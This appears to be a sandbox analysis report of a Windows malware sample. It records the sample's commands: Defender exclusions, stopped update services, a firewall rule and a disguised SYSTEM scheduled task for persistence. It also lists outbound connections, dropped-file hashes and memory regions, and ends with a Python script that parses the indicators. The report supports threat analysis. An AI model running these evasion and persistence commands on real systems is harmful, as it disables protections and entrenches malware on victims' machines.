"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231211092208.log C:\Windows\Logs\CBS\CbsPersist_20231211092208.cab

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\4379.exe

C:\Users\Admin\AppData\Local\Temp\4379.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {C0F010CB-BB92-4761-8B10-3FC9D7772C85} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Users\Admin\AppData\Local\Temp\ACB7.exe

C:\Users\Admin\AppData\Local\Temp\ACB7.exe

Network

Country Destination Domain Proto
RU 81.19.131.34:80 81.19.131.34 tcp
RU 185.172.128.19:80 185.172.128.19 tcp
RU 77.105.132.87:6731 N/A tcp
MD 176.123.7.190:32927 N/A tcp
RU 77.105.132.87:6731 N/A tcp
RU 77.105.132.87:6731 N/A tcp
RU 77.105.132.87:6731 N/A tcp

Files

memory/2116-0-0x0000000000400000-0x000000000040B000-memory.dmp

memory/2116-2-0x0000000000400000-0x000000000040B000-memory.dmp

memory/1220-1-0x0000000002B00000-0x0000000002B16000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C31.exe

MD5 f88edad62a7789c2c5d8047133da5fa7
SHA1 41b1f056cdda764a1c7c402c6fa4f8ab2f3ce5f9
SHA256 eb2b1ce5574096b91eb9e0482117d2518ab188c0747a209dc77e88d30bb970dc
SHA512 e2d5b0ace5dfd3bd2321b2a42b7e7725071ca440389dc5ef12720a34727ae84c2907cd7befeae5d53568d9deaee8443f4cbda44b598cfc9b6316d9389be09a60

memory/2080-12-0x00000000000F0000-0x000000000012C000-memory.dmp

memory/2080-17-0x0000000073F10000-0x00000000745FE000-memory.dmp

memory/2080-18-0x00000000075E0000-0x0000000007620000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B424.exe

MD5 c94b24f6518a3f4284e7123b0086af8e
SHA1 5b1260b8ee49750d16ea0313af7165f5f1f9b4a2
SHA256 701195cafc919bccf2c06b20e3f74c3f5419b15556905f31daa92dd3d841915a
SHA512 ff6dee6aa4777a1356b87af187ac50d6f56836248c7732f6b813e483f97655fcccd04e4da5e2a9ddd5308453eee2975410e4b5cc1702808caf26133ff27181be

C:\Users\Admin\AppData\Local\Temp\B424.exe

MD5 9082c31e554840c3795c2afc093a873c
SHA1 a654430ddc1a55d0d357647f0690e502c7febb1c
SHA256 a380fd5028c4adb5a9149b6f71c35632060c96e3bbb9b3a05946e0067e5b037b
SHA512 d5d0ac48b922970a18f80708404ab8c87a4b9b94dabc0b45aca19c4b0eef5e116d031856640d0de981833c2c018a31074f2a8755b58d01b1c23f867b1e9ae796

memory/2080-26-0x0000000073F10000-0x00000000745FE000-memory.dmp

memory/2532-27-0x0000000073F10000-0x00000000745FE000-memory.dmp

memory/2532-28-0x0000000001110000-0x00000000025C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B962.exe

MD5 91d23595c11c7ee4424b6267aabf3600
SHA1 ef161bb8e90cebdf81f4e53dfccb50c1f90a9a02
SHA256 d58937d468f6ca92b12ee903a16a4908de340f64f894cf7f1c594cd15c0c7e47
SHA512 cb9ed75c14e7b093cabab66c22d412371c639ace31fbe976c71ffec6007bf85b3d7d3e591fe5612e2a035298398d32e1aa7dc0d753f93328ebc2ce8e44fb8d2b

memory/2080-35-0x00000000075E0000-0x0000000007620000-memory.dmp

memory/2560-36-0x0000000073F10000-0x00000000745FE000-memory.dmp

memory/2560-37-0x00000000012C0000-0x00000000012FC000-memory.dmp

memory/2560-38-0x00000000071F0000-0x0000000007230000-memory.dmp

\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 f56c473b355a63144812937b3efff4c4
SHA1 c7037c6aafb5b9be457faee4d0b629ac1a9edcb3
SHA256 7734c5cedf78d64944ac55f8dddbc40440184202c94edabb5cb4c058db53fabb
SHA512 49efc1311a88245ffb3496f265428bdad03ce7429e52af218cfbcb3dbd7d37fa018f6ab79a8008b3c305a2cbeef0172409b97d5db2789ab3b1f16796367e6956

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 77471d919a5e2151fb49f37c315af514
SHA1 0687047ed80aa348bdc1657731f21181995b654c
SHA256 52666594a3e8bd7ac277411e215e1f65a7771f7c1d5b00a9e6ec95fade64f1f1
SHA512 6ffb45e79b03bac2820c98503793cd11c13803f49522eea9334c4c6cd05384dda3a60b0a8a8f363abc439ad444f1a8da290f0350fa69b75b6c3c9701177f8844

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 cde750f39f58f1ec80ef41ce2f4f1db9
SHA1 942ea40349b0e5af7583fd34f4d913398a9c3b96
SHA256 0a434be25f55f27ce0adbdfb08efeac1da01125b3e9194a94669bc7e9c6fe094
SHA512 c181faacbef70f8a91606943470af50cfd443958c48601051371ff5d9bf66bb9ec794571b05a347a7f5776f06484dc007f535591d2f5e1c57e3c0ee04f3e9580

\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 4a9e40fa8264d6e63bf044600ae92ec1
SHA1 917d952821b9c1ae38205a036ee4540afdf48f8a
SHA256 611487839bfadd009afa344945503a08ea240b2b966b924ab6c0cc160995798d
SHA512 1a1a1eb60e1710e6ad89bc3c4e7d87d032a463f905d03ff7f1a8bfc18ed81cb96951fe315659526b2ce40a55d05de3601c19643a17b915c1bb4efed43aaeea20

\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 6200a658245d0bf4fab336e6018a8fef
SHA1 c4bd77e3561eeda70eb68432fa0b146e8777a648
SHA256 7ab8cb78dd3a44504e05aacb1daec6771793c4072c4a1e2bdb959799f8e96b66
SHA512 496dcb042306af0c59134a4f4b2def798926869f537c6c650d67efc3e803804b88a0d07005fbf8714e7d8fb7dc145419c9da42c6f02d9ac57d41a7353325b5d9

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 5ac65af3e0f66483939df609c943687b
SHA1 78c3ecf5ba7e83af38c9757106c7e6f707ff3d06
SHA256 91e915c23f1af380e877a0ccd735aabd48291c2db113665d690134749b80c351
SHA512 afc52e4ef3fc76258372f0d5ec7cbce31c8b238c62f8007217ba34f327e1a122da6f5715d5f6e3159f8673470a7f1dda4ddccb844f655377eada578801bfa6ab

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 98eff24d7fa8551dd0b43091ba9e863d
SHA1 e8443f8d734e425c6251c69518552f0bcd1c22a9
SHA256 524316c79ec405709dfe99e82100dcb3758960fc250796c2cd2b26eaddbd5451
SHA512 6ec7635c29e8d74539930f055fa7e0a677b93acb622ec49f5059d5331ce22a8767ec5bf4ba673e770f2a3be346cabc974c232e64ba81f4b263b9315be1519ec4

\Users\Admin\AppData\Local\Temp\Broom.exe

MD5 ec84319ca2e52e8ddc444fdbcb1e4666
SHA1 fe7d89bae5c7c5bd8563b9dc4da9a52da2f4549c
SHA256 7b48e22bf0054e327336eeb35ea7dea0ece5db17ae5a3ed7e416f0e4db09ab4b
SHA512 22a1f636bd2cf22cdd807aa022088b7f84dca12b2b906cfc703db4438bf58eaaeea5bbb87f0e37ad578281bcc0f19812443303b2540eeaa7e43680921a787a54

C:\Users\Admin\AppData\Local\Temp\Broom.exe

MD5 0b603f86939ba69bf133915c6871d0e6
SHA1 8998a419786e1d3722835962cdc0f0d942909a24
SHA256 6d0caf948329a7fb4628073c51188ab5877a942fdded1b63706855653c795d48
SHA512 d139849db2417729e1ca0ff4c91520b41513da366258f44077dd57ccc16bdaf38b79f937668740bfeeb766e715ea7bcfbd386ff8f8930768c9445ea6cab12089

\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 f673b327203f45d0c12815e59a175ced
SHA1 105c6133f8d4d05dd44ccbf2214210b2eb45be95
SHA256 70b4a85c674d6b17bfd114b2b97adafcb07ba97586b62d59bde8ad179d3d9be8
SHA512 de74814594a5405603ff38b3377ae84d1bf3c2bd7d737fa0160c6e4f45e27058de75115fba468ca0f3f7ab01ffa66689d193af29c451d3684bfbf925f62510e9

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 555f59366510e35bd7191edededd052b
SHA1 4507fc4a52a76efcfd8afb28f6c95023fd953bcd
SHA256 d70008131c459e2d73aa0c2894005e12c8c33fb0417df61b9c4ce424cdbb93e4
SHA512 98c85e611ea1edfcf83d8622ab5af02f05968a9a377635050af5f4f435313515510f7c72ca85ba51123dc139e929375709f085af97879bdc9a11755b49551bc4

memory/1968-75-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 315283edfb9669f4e36189fe591a9741
SHA1 8b428b50643a688e73eaea880e3fba39c2addca9
SHA256 31643fc0c9205763f3a8afc73ebbf7b3a47d613cd74d0d6f1fc3857429427f19
SHA512 50bfc177cc511e3efa893b6e57d979b539dadb31af4e9cbca7059f40d3a981a7b3d4d8227b9e004c73c97fbe2f08e54a7af2efc336485e5e6eb51eb79eeca247

memory/1332-78-0x0000000000230000-0x0000000000231000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-3EGTU.tmp\tuc3.tmp

MD5 5525670a9e72d77b368a9aa4b8c814c1
SHA1 3fdad952ea00175f3a6e549b5dca4f568e394612
SHA256 1180706added2a7899f08f25a9f88ecff5d003ba8964f918d00779565e4a6978
SHA512 757249f7e67f82522a8e3079a22c5cf92111626446a32ad3ef876f23885f62d1bb5bf3238d564e23531d062fe18742568dfc00e33b049bb8eef05eb953ef981a

memory/1740-86-0x0000000000C20000-0x0000000000D20000-memory.dmp

memory/1740-87-0x0000000000220000-0x0000000000229000-memory.dmp

memory/268-106-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-1U35R.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

\Users\Admin\AppData\Local\Temp\is-1U35R.tmp\_isetup\_isdecmp.dll

MD5 a813d18268affd4763dde940246dc7e5
SHA1 c7366e1fd925c17cc6068001bd38eaef5b42852f
SHA256 e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64
SHA512 b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4

\Users\Admin\AppData\Local\Temp\is-1U35R.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/2756-95-0x0000000000240000-0x0000000000241000-memory.dmp

memory/268-118-0x0000000000400000-0x0000000000409000-memory.dmp

memory/268-120-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2532-121-0x0000000073F10000-0x00000000745FE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 98c988e77ef14ba858e40be58ded5b04
SHA1 c66a760f7662c95fb449b247c9fad43edb85a7e3
SHA256 737d88407dfd3b56fe8e8e018ff963d66ce4641b527c796599e44c3575d5fea2
SHA512 f302f0c7522e67cfb24322520df8032d3e0147a1e930510123c5ff41b82d46cbb5ee464c2c4ed61b72f4159c4690b1f3a77c6e9234de514ee71e41d4cf4525f0

\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/2532-125-0x0000000073F10000-0x00000000745FE000-memory.dmp

memory/944-126-0x0000000002730000-0x0000000002B28000-memory.dmp

memory/944-127-0x0000000002730000-0x0000000002B28000-memory.dmp

memory/2560-128-0x0000000073F10000-0x00000000745FE000-memory.dmp

memory/944-129-0x0000000002B30000-0x000000000341B000-memory.dmp

memory/2560-130-0x00000000071F0000-0x0000000007230000-memory.dmp

memory/944-131-0x0000000000400000-0x0000000000D1C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 e7695b7404683e52db6fe2e5c645ca43
SHA1 f3075bb0fb6e7ca4d195062ee779250b0d2926e7
SHA256 1d8d40f0548bf6a00d849798a4d6ef7734ac31f43eae2942bc14a292470f7d82
SHA512 4efea23dde463f7b9367535ac71b966a89d7a713430dabef15bc077396ace6c201e8cddfbd18cc82d96ca6f7f2ae85c73a387f283026f4fd2081651add2e7c33

memory/1220-134-0x0000000002B60000-0x0000000002B76000-memory.dmp

memory/944-133-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/1332-135-0x0000000000400000-0x0000000000965000-memory.dmp

memory/1968-136-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2756-137-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/268-138-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2060-139-0x000000013FFB0000-0x0000000140551000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 abb5a57c59b4f6a3d8b4f0cac0b43b8c
SHA1 3ae95d220b37aa73cae850952417586222c2dda2
SHA256 e06d2a34e0221ecc2d1d4052a6513cb7be5fef90b7f22947e0ddcc40e6cfe7ca
SHA512 0b4ce0bc6ddf53faa9971ac7ab938771b5c7308541b87b4b7e4c7baf2d0508b0565d0771c329c74ac8971213f5ea63c7f31100ea54e0bb1e3e6e834856ce5abe

memory/944-141-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/944-142-0x0000000002B30000-0x000000000341B000-memory.dmp

memory/944-143-0x0000000002730000-0x0000000002B28000-memory.dmp

memory/1332-146-0x0000000000230000-0x0000000000231000-memory.dmp

memory/2952-149-0x00000000025B0000-0x00000000029A8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4379.exe

MD5 37a9cca03d6d8aae8fe676aea4297e47
SHA1 d082a9bfa4e3f5f8af6cd810b12500aa9310a246
SHA256 628ff3a1bb708fd04d69da7857b743233672695725a93aaf6f1301459bd32035
SHA512 d98e6fd2d3db0ccc85aabf6c6b70a3dbbf4a8b66bf4a8060d0d1c234c7e1582827c6462c766e697ab92168276584a288f9907590e9b52747bea0d0d7257b8f83

C:\Users\Admin\AppData\Local\Temp\4379.exe

MD5 acd4e9d2d0fbb96258d6567cf0c12316
SHA1 264f55756ff65419628398a3679a8c3dd588d926
SHA256 68cda7a9788d1e38965b6fecdcc6a852e90acb531b45eb8aa15f11c61aea4fd9
SHA512 e3cbff560b263351877a42f3d2e1e445dafb5d61cb1daa774259f0a7f68e1284226efb5c4a0024ee6ca6b34a30ca808b08facabeceb693013565cba1fc8d010c

memory/1304-157-0x00000000003F0000-0x00000000009A2000-memory.dmp

memory/2756-159-0x0000000000240000-0x0000000000241000-memory.dmp

memory/1304-160-0x0000000073F10000-0x00000000745FE000-memory.dmp

memory/1304-161-0x0000000005270000-0x00000000052B0000-memory.dmp

memory/2952-165-0x00000000025B0000-0x00000000029A8000-memory.dmp

memory/2952-166-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/2592-182-0x000000001B170000-0x000000001B452000-memory.dmp

memory/2592-183-0x0000000002450000-0x0000000002458000-memory.dmp

memory/2592-184-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

memory/2592-185-0x00000000026A0000-0x0000000002720000-memory.dmp

memory/2592-186-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

memory/2592-187-0x00000000026A0000-0x0000000002720000-memory.dmp

memory/2592-188-0x00000000026A0000-0x0000000002720000-memory.dmp

memory/2592-189-0x00000000026A0000-0x0000000002720000-memory.dmp

memory/2952-190-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/2592-191-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 45a2067cbf4567e288d07019eb7a68cd
SHA1 5fefc731d044d6247050f76db9ac383c269f7794
SHA256 65b53059a7831dc2b6cd29a953868361b3b37af0b258a64ec1cc605806e2d007
SHA512 2259f13c74d96f13d2160c581dd97d7cb57fb8f9cc51b87bdbff4f2c755f218fab0f94ad67b8ace0bc93da43fd4656ca5b986a7285027d2b7f818516f862a35a

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AJIFV1B30XNNZQ6MKOG8.temp

MD5 822597e8d9d3e1702f58d8b759ebb98e
SHA1 aee89a768cf79e544e9313d63b8bfaa70c8fbafb
SHA256 01da5f43fad9a532f576f8baf2b2a77057db2638dadec03b10321f43a3fc4670
SHA512 e978b06fc674de11a0c6ae8c30ea57798208e750c3488bc2b3383e746bd369702ed0b6933412123eb7e206c136888faefbbe6d3619fde97dc969be12617fc402

memory/1876-202-0x0000000001F50000-0x0000000001F58000-memory.dmp

memory/1876-201-0x000000001B160000-0x000000001B442000-memory.dmp

memory/1876-203-0x000007FEF5040000-0x000007FEF59DD000-memory.dmp

memory/1876-204-0x00000000023E0000-0x0000000002460000-memory.dmp

memory/1876-205-0x000007FEF5040000-0x000007FEF59DD000-memory.dmp

memory/1876-206-0x00000000023E0000-0x0000000002460000-memory.dmp

memory/1876-207-0x00000000023E0000-0x0000000002460000-memory.dmp

\Windows\rss\csrss.exe

MD5 9890563f729fd6204fe444239ef96712
SHA1 1e326dce79e8fbd7b3fbb58c42ee8cbd0f19b01c
SHA256 2cf2533ea3dc8865b0de7abb4e8e44feb0d3eb5964eed911adad73924331d4a5
SHA512 54e3dd8913a6cbe1545476a861308505f05e75b5b0b9051ffeb04ac952378564a6385419db3f86d6a5130d292aab8ae9614fe253bd78db20402bb8ef12535e67

memory/1304-210-0x00000000054B0000-0x0000000005642000-memory.dmp

memory/2952-218-0x0000000000400000-0x0000000000D1C000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 be7a91954af6ada6a01c772ed847bf34
SHA1 a63ff4ee47dd98cb1a8421829fecdbfaebc05cfd
SHA256 870521d8d909645904244a2c6b1716569e633156fe30868c5590041dde4e63a5
SHA512 1d2f3c88a71183531b1c4c319832f54f9070fe1b64bdb35e3ab3dc26fd45cc11ec16ab4f5a4b7b492cfdc8d46258f5c916fc12ce393edf789a42b377f4f4418d

memory/1876-219-0x00000000023E0000-0x0000000002460000-memory.dmp

memory/1876-220-0x000007FEF5040000-0x000007FEF59DD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 f36c6dc3ceca249d70b66af7b97492b3
SHA1 0a798a00dd9ab4716535116987acc22b7fe3f933
SHA256 9de3209114a3274f94cc8fc05bdb4cd361908ffcd8b769e91e827fcbecce4c6d
SHA512 08e99b720f9e499c7ef018e17f921932a90d16e416df3b1d680121b7866efd4c2693b00fdaeacaf85cac927a1e13beeaf9546e92e9f64e08478aacd80ae3a97f

memory/2060-223-0x000000013FFB0000-0x0000000140551000-memory.dmp

\Users\Admin\AppData\Local\Temp\Protect544cd51a.dll

MD5 544cd51a596619b78e9b54b70088307d
SHA1 4769ddd2dbc1dc44b758964ed0bd231b85880b65
SHA256 dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd
SHA512 f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719

memory/1304-228-0x0000000002320000-0x0000000002330000-memory.dmp

memory/1304-229-0x0000000073F10000-0x00000000745FE000-memory.dmp

memory/1304-230-0x0000000005270000-0x00000000052B0000-memory.dmp

memory/1304-231-0x0000000005270000-0x00000000052B0000-memory.dmp

memory/1304-232-0x0000000005270000-0x00000000052B0000-memory.dmp

memory/1304-233-0x0000000005270000-0x00000000052B0000-memory.dmp

memory/1304-234-0x0000000005270000-0x00000000052B0000-memory.dmp

memory/1304-236-0x0000000005270000-0x00000000052B0000-memory.dmp

memory/1304-237-0x0000000005270000-0x00000000052B0000-memory.dmp

memory/1304-238-0x0000000005270000-0x00000000052B0000-memory.dmp

memory/1304-240-0x0000000005A70000-0x0000000005B70000-memory.dmp

memory/1304-241-0x0000000005270000-0x00000000052B0000-memory.dmp

memory/1964-243-0x00000000025B0000-0x00000000029A8000-memory.dmp

memory/1964-246-0x0000000000400000-0x0000000000D1C000-memory.dmp
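The dropped-file and memory-region listing above is the part of this report most people actually reuse: the SHA256 values go into a blocklist or retro-hunt, and the `memory/PID-index-start-end` entries tell you which process had the unpacked payload mapped and how large the region was. Two details are easy to miss when reading it by hand: `4379.exe` and `C:\Windows\rss\csrss.exe` each appear twice with different hashes (the file was written and then overwritten during detonation, so both hashes are worth keeping), and `Protect544cd51a.dll` carries the first eight hex digits of its own MD5 in its file name. The script below is an added example, not part of the sandbox report or its tooling; it parses an excerpt of the listing copied from the entries above (the only assumption is the layout the report uses: a path line, then `MD5`/`SHA1`/`SHA256`/`SHA512` lines, and `memory/...-memory.dmp` lines for dumped regions), validates the digest lengths, flags paths that were rewritten with different content, computes region sizes, and tests the MD5-in-filename observation generically.

```python
"""Parse the dropped-file / memory-region listing of a sandbox report.

Added example; not the report's own code. Assumes the listing layout seen
in the report: a path line, then hash lines, and memory/PID-INDEX-START-END
lines for dumped regions.
"""
import re
from collections import defaultdict

# Expected hex length per digest (digest size in bytes * 2).
HASH_LENGTHS = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

MEM_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<idx>\d+)-0x(?P<start>[0-9A-Fa-f]+)"
    r"-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$"
)
HASH_RE = re.compile(r"^(?P<algo>MD5|SHA1|SHA256|SHA512)\s+(?P<hex>[0-9a-fA-F]+)$")
PATH_RE = re.compile(r"^(?:[A-Za-z]:)?\\")  # "C:\..." or a bare "\Windows\..." path

# Excerpt copied from the listing above (a real subset, not invented data).
SAMPLE = r"""
memory/944-133-0x0000000000400000-0x0000000000D1C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4379.exe

MD5 37a9cca03d6d8aae8fe676aea4297e47
SHA1 d082a9bfa4e3f5f8af6cd810b12500aa9310a246
SHA256 628ff3a1bb708fd04d69da7857b743233672695725a93aaf6f1301459bd32035
SHA512 d98e6fd2d3db0ccc85aabf6c6b70a3dbbf4a8b66bf4a8060d0d1c234c7e1582827c6462c766e697ab92168276584a288f9907590e9b52747bea0d0d7257b8f83

C:\Users\Admin\AppData\Local\Temp\4379.exe

MD5 acd4e9d2d0fbb96258d6567cf0c12316
SHA1 264f55756ff65419628398a3679a8c3dd588d926
SHA256 68cda7a9788d1e38965b6fecdcc6a852e90acb531b45eb8aa15f11c61aea4fd9
SHA512 e3cbff560b263351877a42f3d2e1e445dafb5d61cb1daa774259f0a7f68e1284226efb5c4a0024ee6ca6b34a30ca808b08facabeceb693013565cba1fc8d010c

\Users\Admin\AppData\Local\Temp\Protect544cd51a.dll

MD5 544cd51a596619b78e9b54b70088307d
SHA1 4769ddd2dbc1dc44b758964ed0bd231b85880b65
SHA256 dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd
SHA512 f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719

memory/2060-223-0x000000013FFB0000-0x0000000140551000-memory.dmp
"""


def parse_listing(text):
    """Return (files, regions, problems) for one report listing."""
    files, regions, problems = [], [], []
    current = None  # the file entry that subsequent hash lines belong to
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MEM_RE.match(line)
        if m:
            start, end = int(m["start"], 16), int(m["end"], 16)
            if end <= start:
                problems.append(f"bad region bounds: {line}")
            regions.append({"pid": int(m["pid"]), "index": int(m["idx"]),
                            "start": start, "end": end, "size": end - start})
            current = None
            continue
        m = HASH_RE.match(line)
        if m:
            if current is None:
                problems.append(f"hash line without a preceding path: {line}")
                continue
            algo, hexval = m["algo"], m["hex"].lower()
            if len(hexval) != HASH_LENGTHS[algo]:
                problems.append(f"{algo} for {current['path']} has length {len(hexval)}")
            current["hashes"][algo] = hexval
            continue
        if PATH_RE.match(line):
            current = {"path": line, "hashes": {}}
            files.append(current)
            continue
        problems.append(f"unrecognised line: {line}")
    return files, regions, problems


def rewritten_paths(files):
    """Paths listed more than once with differing SHA256: written, then overwritten."""
    by_path = defaultdict(set)
    for f in files:
        if "SHA256" in f["hashes"]:
            by_path[f["path"]].add(f["hashes"]["SHA256"])
    return {p: sorted(h) for p, h in by_path.items() if len(h) > 1}


def unique_sha256(files):
    """Deduplicated SHA256 list suitable for a blocklist or retro-hunt."""
    return sorted({f["hashes"]["SHA256"] for f in files if "SHA256" in f["hashes"]})


def largest_region(regions):
    """The dumped region with the biggest span; usually where the unpacked PE lives."""
    return max(regions, key=lambda r: r["size"])


def md5_prefix_in_name(entry, n=8):
    """True when the file name embeds the first n hex digits of its own MD5."""
    md5 = entry["hashes"].get("MD5")
    if not md5:
        return False
    name = entry["path"].rsplit("\\", 1)[-1].lower()
    return md5[:n] in name


if __name__ == "__main__":
    files, regions, problems = parse_listing(SAMPLE)
    print(f"{len(files)} file entries, {len(regions)} regions, {len(problems)} problems")
    for path, hashes in rewritten_paths(files).items():
        print("overwritten during detonation:", path, hashes)
    big = largest_region(regions)
    print(f"largest region: pid {big['pid']} 0x{big['start']:X}-0x{big['end']:X} ({big['size']} bytes)")
    for f in files:
        if md5_prefix_in_name(f):
            print("file name carries its MD5 prefix:", f["path"])
```

Run it on the full listing (paste the whole Files section into `SAMPLE`) and every distinct SHA256 is collected, including both versions of overwritten files; the `problems` list is the check that the copy-paste did not truncate a digest, since a SHA256 that is not 64 hex characters will never match anything downstream.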